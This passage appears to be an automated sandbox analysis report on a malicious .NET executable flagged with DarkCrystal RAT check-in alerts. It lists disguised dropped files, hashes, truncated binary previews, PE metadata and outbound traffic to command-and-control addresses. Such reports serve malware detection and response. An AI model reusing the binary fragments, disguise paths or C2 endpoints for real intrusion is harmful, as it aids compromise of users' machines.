                                                                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                                C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4608
                                                                                                                Entropy (8bit):3.941006147870262
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:6JJXPtKM7Jt8Bs3FJsdcV4MKe27QBvqBHqOulajfqXSfbNtm:oPRPc+Vx9MQBvkUcjRzNt
                                                                                                                MD5:2C206799D659065E6C9853973CBE6075
                                                                                                                SHA1:2CB6368DA1C7309FE72B0D1AFF7AF1C9025E90D9
                                                                                                                SHA-256:A79E16DE2601C983291970B360D16B4C8F0CCCBE9877EEB62554541A4B9A93B5
                                                                                                                SHA-512:D9279A77EE255AEC4678238A50F42D76407EE488CF128D2B1389B1110AB0E42178F5632FF0195E2FBA771E89DA5520F8DEDBF2D3ECD27FF4220E9E2ED05ED02D
                                                                                                                Malicious:true
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.;g.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                                                C:\Windows\Vss\Writers\Application\94dd0fcc3d3f01

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (798), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):798
                                                                                                                Entropy (8bit):5.886178447864095
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:f+VPYh548IES/LwBML7vU9rneHvYhmbR1Uh6d5DRUSx4i8a6j2ziWsxSGauR1k:yQQ8IESDDuegKR/bFTx4yGUsi
                                                                                                                MD5:8E9DB41D0A1F939603F9BA49D485E513
                                                                                                                SHA1:DF5BCD2FA3C0D6D0D3121C60D2C4E1B659A1EB0E
                                                                                                                SHA-256:1EA538C8D8A7B6C8BD5F5B9AD74AF034212DFF60043D5444721D70F6B81B9891
                                                                                                                SHA-512:0BDFDAD4933230ED1E70FF0C305E6DA32249A86B33A4E874E245F2941CF14EA1B1202BE8065D6CC740F3FF08F4D08F2EF8C7729090F42EDF160BA8F3D9E42886
                                                                                                                Malicious:false
                                                                                                                Preview:kklldaVyKIpfJ46GHoamK5wtvvb6WmBxkZug6eZ9sH7WeSri5xfSSYmoy1zs8ZchH25uKaKnPb3C7ZPcD3AiHsfLwFrEorATpaPmX7Yfn1D1ejrYlWoFY3ZYWt7EtF8hakXhKnFFff5PporNYSdRC54wA0Po9Uwi3fa4MKO8Rjj28KtsCupamqfeplgUXbGLtWWJNwBOEeAdVCx0GgmPoV6M96Oln4k0dYJlxkePtaWHqCInxpN1y0gXaKJRhakJ3JA73MDgBWgN9yf7xlx8qtBm1vLnaNrS0MOhCLulmrzcUSYloMe6mmdJHXFHAZGypNXxk84m1MW93jRjXj8OtvqNtEZoFmkMkBwH4kBqR2EZPdPiGgtaa2F4gJDfjQgPmJY2wKowiS60qR8Qy0ij2Jvs62kvggHBVzwGEXw5162H5ONOLxqsr6WcYp64j3PCL5e1e1LbEmr5QnxroVjtzYTZdTsYa1V8q069tWuTmPnFOaMu2OPOUgMxmFYKJxAMQtOarx8SlPHkuNKCH7fMmHoKnJXn8jKyObyfLvCEP7mEZmCY4VCLRykJEEwiZUUBFSVTZo1V5a6pejuAG9smg8hZ1pbG9eo4nl9HRt9PeqQ015oeUvcamreGv5cuNuWbwBC3kmtXAcHzrqi6B6vNCOS5G3VVRPCtUzE02u4rBFaJjoYEXgsR8IYisGxrQYFvaYf2mrDRBDM6xJVbeR7uguvLagHw6Nbm9psLJgcqdbP46buivVM9bVOqmUbFjRUymj7HbJS7yRREf0P8viAlAbLobCiyFX

                                                                                                                C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.

                                                                                                                C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe:Zone.Identifier

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:false
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                \Device\Null

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\PING.EXE
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):502
                                                                                                                Entropy (8bit):4.6129248873154785
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:PKmfl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:RdUOAokItULVDv
                                                                                                                MD5:1962DD4D65A3076C2C1907F163BFA68D
                                                                                                                SHA1:12771D9984DFC36B7F1F13283AFCA408B72F0929
                                                                                                                SHA-256:A6DDE7150A043033EAABBC21C44DFFD6A63890B15A4F1F34BC65EACD2EB10651
                                                                                                                SHA-512:C3D19BCE6689F2D9BD48D310F4148A3B78F6E0318BD6AF437BA5F323DFEC7AA292022143254DD7848D2AE75F6100EC7791D9A15781534694CD8F7257967373AF
                                                                                                                Malicious:false
                                                                                                                Preview:..Pinging 609290 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                File name:LzmJLVB41K.exe
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5:2d756772bc00e5778d794c107358ddf7
                                                                                                                SHA1:77229fc9ceeb137c6644a4fa3085aecabaf94ec3
                                                                                                                SHA256:a7f4c48301ad6b01c8777427eaceb965a9e0c14d493f44d1dea4f8d498123469
                                                                                                                SHA512:31fae1a50618ed221cef3bfc72a017e8e925c3aa2bac727040ee655d9dff567813e91d76fecda0478653d50b8061481447ded77939b94e1ec823c3419b68c783
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                TLSH:7595BE1A65928F7BD2A45B318467043D82A4C7323D66FF0A361F20E1A9077B5CA735FB
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@................................

                                                                                                                File Icon

                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x5e948e
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x6733AC44 [Tue Nov 12 19:28:04 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                jmp dword ptr [00402000h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1e94400x4b.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ea0000x320.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1ec0000xc.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x20000x1e74940x1e7600592d96b83e0140b309d1c091a6e55fb3False0.7868408766670941data7.564809337686255IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x1ea0000x3200x400718a4114cbf5b42966612d186812a8a8False0.3544921875data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .reloc0x1ec0000xc0x200c1198f7de73751649b75124b410033e8False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_VERSION0x1ea0580x2c8data0.46207865168539325

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                mscoree.dll_CorExeMain

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-11-18T09:17:12.477401+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64973334.117.59.81443TCP
                                                                                                                2024-11-18T09:17:41.336700+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.64987837.44.238.25080TCP
                                                                                                                2024-11-18T09:18:14.875621+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64999134.117.59.81443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 18, 2024 09:17:10.560600996 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:10.560662031 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:10.561261892 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:10.702441931 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:10.702476025 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.320501089 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.320574999 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.329474926 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.329495907 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.329766035 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.374952078 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.419331074 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.518167019 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.519630909 CET4434972634.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.519731998 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.524996996 CET49726443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.528127909 CET49733443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.528224945 CET4434973334.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:11.528379917 CET49733443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.528619051 CET49733443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:11.528654099 CET4434973334.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:12.327421904 CET4434973334.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:12.332431078 CET49733443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:12.332447052 CET4434973334.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:12.477411032 CET4434973334.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:12.478748083 CET4434973334.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:17:12.479181051 CET49733443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:12.479660034 CET49733443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:17:12.644541025 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:12.644584894 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:12.644789934 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:12.648380041 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:12.648395061 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.489103079 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.489173889 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.492211103 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.492219925 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.492460012 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.493808985 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.535331011 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.733244896 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.807693005 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.807708979 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.809184074 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.809195995 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.809309006 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.809314013 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.809437037 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.809442997 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.809483051 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.809488058 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.809521914 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.809525967 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.823730946 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.823761940 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.823951006 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.823960066 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.823996067 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.824012995 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.824042082 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.824050903 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.827666998 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.827686071 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.827706099 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.827713966 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.827759981 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.827779055 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.827795029 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.827809095 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.827824116 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.827832937 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.827836037 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.827846050 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.831777096 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.831789017 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.831866980 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.831875086 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.835290909 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835298061 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.835324049 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835351944 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835355043 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.835383892 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835385084 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.835422039 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835438013 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.835474968 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835484028 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.835542917 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835544109 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.835553885 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.835561991 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.838748932 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.838754892 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.838917017 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.838924885 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.838962078 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.838968992 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.838993073 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.838998079 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.839045048 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.839050055 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.839075089 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.839080095 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:13.839169979 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:13.839190960 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:14.627931118 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:14.627988100 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:14.628840923 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:17:14.628890038 CET44349739149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:17:14.628935099 CET49739443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:13.315960884 CET49990443192.168.2.634.117.59.81
